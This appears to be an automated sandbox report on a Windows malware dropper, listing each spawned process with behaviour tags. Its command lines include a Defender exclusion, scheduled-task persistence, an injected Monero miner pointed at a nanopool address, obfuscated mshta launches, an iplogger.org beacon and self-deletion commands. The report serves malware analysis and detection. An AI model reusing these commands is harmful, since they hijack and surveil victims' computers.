5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3360 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3360 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3360 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 1876 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 1876 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 1876 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 2828 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 2828 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 2828 5032 setup_install.exe cmd.exe PID 740 wrote to memory of 1788 740 cmd.exe Thu2025d6674aed72ba.exe PID 740 wrote to memory of 1788 740 cmd.exe Thu2025d6674aed72ba.exe PID 740 wrote to memory of 1788 740 cmd.exe Thu2025d6674aed72ba.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2616
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7540
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20c467678e2c.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20c467678e2c.exeThu20c467678e2c.exe6⤵
- Executes dropped EXE
PID:3972 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:4104 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:6524
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:6952 -
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:5592
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2768 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:8964
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:6764
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:896 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 8088⤵
- Program crash
PID:3496 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 8288⤵
- Program crash
PID:1248 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 8968⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 10208⤵
- Executes dropped EXE
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 10888⤵
- Program crash
PID:4692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 10768⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 10368⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5092 -
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 13488⤵
- Program crash
PID:5604 -
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Modifies data under HKEY_USERS
PID:15800 -
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3844 -
C:\ProgramData\4873306.exe"C:\ProgramData\4873306.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3860 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3860 -s 17689⤵
- Program crash
PID:5556 -
C:\ProgramData\6650495.exe"C:\ProgramData\6650495.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1872 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20f2cf5e0c.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20f2cf5e0c.exeThu20f2cf5e0c.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3048 -
C:\Users\Admin\AppData\Roaming\8684174.scr"C:\Users\Admin\AppData\Roaming\8684174.scr" /S7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4956 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4956 -s 17688⤵
- Program crash
PID:5228 -
C:\Users\Admin\AppData\Roaming\8337894.scr"C:\Users\Admin\AppData\Roaming\8337894.scr" /S7⤵
- Executes dropped EXE
PID:6136 -
C:\Users\Admin\AppData\Roaming\5581443.scr"C:\Users\Admin\AppData\Roaming\5581443.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20dae7c52bc0856.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20dae7c52bc0856.exeThu20dae7c52bc0856.exe6⤵
- Executes dropped EXE
PID:312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20a5f7ccaa78.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exeThu20a5f7ccaa78.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:420 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exeC:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe7⤵
- Executes dropped EXE
PID:524 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exeC:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe7⤵
- Executes dropped EXE
PID:2364 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203b503b429e68.exe5⤵PID:3524
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203b503b429e68.exeThu203b503b429e68.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4512 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:5532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:6096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2094524d5e5b.exe5⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2094524d5e5b.exeThu2094524d5e5b.exe6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4404 -
C:\Users\Admin\Documents\72HVEuHc1LiCdlGyE_KhQi1n.exe"C:\Users\Admin\Documents\72HVEuHc1LiCdlGyE_KhQi1n.exe"7⤵
- Executes dropped EXE
PID:3924 -
C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe"C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7252 -
C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exeC:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe8⤵PID:8404
-
C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exeC:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe8⤵PID:8624
-
C:\Users\Admin\Documents\0IuDRAJglDutmXwQOEhSBXDa.exe"C:\Users\Admin\Documents\0IuDRAJglDutmXwQOEhSBXDa.exe"7⤵
- Executes dropped EXE
PID:7288 -
C:\Users\Admin\Documents\Gn9Jky4_EDbOI58YpznCytCC.exe"C:\Users\Admin\Documents\Gn9Jky4_EDbOI58YpznCytCC.exe"7⤵
- Executes dropped EXE
PID:7316 -
C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe"C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7388 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe"8⤵PID:9868
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Delays execution with timeout.exe
PID:9484 -
C:\Users\Admin\Documents\a3nSYK3QiDj60t0XJFF7UlrQ.exe"C:\Users\Admin\Documents\a3nSYK3QiDj60t0XJFF7UlrQ.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7308 -
C:\Users\Admin\Documents\tH0ctc2jiXFQrqD_hc1dkUzk.exe"C:\Users\Admin\Documents\tH0ctc2jiXFQrqD_hc1dkUzk.exe"7⤵
- Executes dropped EXE
PID:7408 -
C:\Users\Admin\Documents\3j37Icfa8ZkdKtGcGgFo5hHI.exe"C:\Users\Admin\Documents\3j37Icfa8ZkdKtGcGgFo5hHI.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7452 -
C:\Users\Admin\Documents\EWtGNadfMrzbtpsBi9aWUtQT.exe"C:\Users\Admin\Documents\EWtGNadfMrzbtpsBi9aWUtQT.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7584 -
C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe"C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7576 -
C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exeC:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe8⤵
- Suspicious use of SetThreadContext
PID:9168 -
C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exeC:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe9⤵PID:6200
-
C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"7⤵
- Executes dropped EXE
PID:7708 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )8⤵PID:8520
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF ""== "" for %w In ("C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe" ) do taskkill /F -iM "%~nxw"9⤵PID:8372
-
C:\Users\Admin\AppData\Local\Temp\CndH5V.EXeCndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj10⤵PID:8424
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )11⤵PID:6668
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ("C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"12⤵PID:9556
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ11⤵
- Loads dropped DLL
PID:9432 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F -iM "usyw5ZngVKxU1DoBnfAsyAxL.exe"10⤵
- Kills process with taskkill
PID:8644 -
C:\Users\Admin\Documents\2rrWk6aWyhXCRt7PpjtUduKG.exe"C:\Users\Admin\Documents\2rrWk6aWyhXCRt7PpjtUduKG.exe"7⤵PID:7900
-
C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"7⤵PID:7892
-
C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"8⤵
- Modifies data under HKEY_USERS
PID:16672 -
C:\Users\Admin\Documents\AYcoRdCUFo3EVft6taKBoNmp.exe"C:\Users\Admin\Documents\AYcoRdCUFo3EVft6taKBoNmp.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7884 -
C:\Users\Admin\Documents\kgFoGuhcdrrxNuBNV0pnzt35.exe"C:\Users\Admin\Documents\kgFoGuhcdrrxNuBNV0pnzt35.exe"7⤵
- Executes dropped EXE
PID:7872 -
C:\Users\Admin\Documents\RukWAObiV_pk8jgtTfDBZo9L.exe"C:\Users\Admin\Documents\RukWAObiV_pk8jgtTfDBZo9L.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7864 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"8⤵PID:6352
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8920 -
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"9⤵
- Blocklisted process makes network request
PID:9184 -
C:\Users\Admin\Documents\wVv8AImVlR_dbDz6BgqJ11oz.exe"C:\Users\Admin\Documents\wVv8AImVlR_dbDz6BgqJ11oz.exe"7⤵
- Executes dropped EXE
PID:7856 -
C:\Users\Admin\Documents\yT0Jr6qhYrzdROOogtndOL8l.exe"C:\Users\Admin\Documents\yT0Jr6qhYrzdROOogtndOL8l.exe"7⤵
- Executes dropped EXE
PID:7848 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵PID:9832
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
PID:11216 -
C:\Users\Admin\Documents\ItAFNrv2sOXUt7aWaBN3nK6S.exe"C:\Users\Admin\Documents\ItAFNrv2sOXUt7aWaBN3nK6S.exe"7⤵
- Executes dropped EXE
PID:7840 -
C:\Users\Admin\Documents\XgjnLxbzwVfuidtVtZ1khfTK.exe"C:\Users\Admin\Documents\XgjnLxbzwVfuidtVtZ1khfTK.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:7832 -
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"8⤵PID:8672
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:8664 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵PID:8656
-
C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7816 -
C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6988 -
C:\Users\Admin\Documents\jtW2SlgNdt8N1bR8cmz07mY3.exe"C:\Users\Admin\Documents\jtW2SlgNdt8N1bR8cmz07mY3.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8084 -
C:\Users\Admin\Documents\Tj3Ec2O1wj9zalzscQdK5sK5.exe"C:\Users\Admin\Documents\Tj3Ec2O1wj9zalzscQdK5sK5.exe"7⤵PID:8076
-
C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe"C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe"7⤵
- Suspicious use of SetThreadContext
PID:8068 -
C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exeC:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe8⤵PID:9056
-
C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:7568 -
C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"8⤵PID:4428
-
C:\Users\Admin\Documents\rePWGAeA9gG8Y413QzXTBROs.exe"C:\Users\Admin\Documents\rePWGAeA9gG8Y413QzXTBROs.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7560 -
C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe"C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:7552 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im nRYNXU8kXWDM9ct7FinhQA1L.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe" & del C:\ProgramData\*.dll & exit8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im nRYNXU8kXWDM9ct7FinhQA1L.exe /f9⤵
- Kills process with taskkill
PID:9312 -
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:16752 -
C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"7⤵PID:7540
-
C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"8⤵
- Loads dropped DLL
- Checks processor information in registry
PID:4088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 30m_VqBd5yyKL_Q269RMiiX0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe" & del C:\ProgramData\*.dll & exit9⤵PID:7132
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 30m_VqBd5yyKL_Q269RMiiX0.exe /f10⤵
- Kills process with taskkill
PID:11080 -
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
PID:17592 -
C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"7⤵PID:7528
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵PID:4672
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"9⤵PID:8580
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"8⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:5484 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd6dcfa380,0x7ffd6dcfa390,0x7ffd6dcfa3a09⤵PID:9300
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1840 /prefetch:29⤵
- Suspicious use of SetThreadContext
PID:9748 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 /prefetch:89⤵PID:8788
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 /prefetch:89⤵PID:4972
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2568 /prefetch:19⤵PID:6664
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:19⤵PID:492
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:19⤵PID:9368
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:19⤵PID:10284
-
